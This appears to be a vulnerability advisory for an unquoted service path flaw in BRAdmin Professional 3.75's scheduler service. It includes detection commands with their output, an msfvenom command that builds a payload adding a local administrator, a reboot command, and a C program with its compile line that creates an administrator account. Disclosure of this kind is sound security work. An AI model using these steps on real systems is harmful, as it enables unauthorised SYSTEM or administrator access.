Comment on page
BRAdmin Professional 3.75 - Unquoted Service Path
BRAdmin Professional 3.75 - BRA_Scheduler Unquoted Service Path Privilege Escalation
"BRAdmin Professional 3.75 software allows system administrators to view and control the status of their networked Brother and most other SNMP compliant printing devices."
If a user can insert a executable which is called as "BRAdmin" under the
C:\Program Files (x86)\Brother\
directory , local system privileges could be obtained by the user. For example, an user that has administrative privileges can obtain
SYSTEM
privileges through the vulnerable service. This situation is valuable, especially if additional writing permission is applied to
\Brother\
directory for unprivileged user.#Detection of unquoted service path:
C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "BRAdmin" |findstr /i /v """
Brother BRAdminPro Scheduler
BRA_Scheduler
C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe
Auto
C:\>sc qc BRA_Scheduler
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: BRA_Scheduler
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Brother BRAdminPro Scheduler
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
1- User has a write privilege to
\Brother\
directory and creates msfvenom payload that adds new localadmin user to Windows computer.msfvenom -p windows/adduser USER=unsafe PASS=In.line13 -f exe > BRAdmin.exe
2- Then user downloads this executable under the
\Brother\
directory and restarts the computer.For restarting computer from command line:
shutdown /r /t 0
3- After the restarting process ,
unsafe
user will be created and added the local Administrators group.Windows Defender will detect the
BRAdmin.exe
executable as malicious after the unsafe
user is added the local administrators group if target didn't make last Windows update properly. Or below code could be used after compiling with gcc.
#include <stdlib.h>
int main ()
{
int i;
i = system("net user joker j@k3r.. /add & net localgroup Administrators joker /add");
return 0;
}
i686-w64-mingw32-gcc addLocalAdmin.c -lws2_32 -o add.exe
# Author: Metin Yunus Kandemir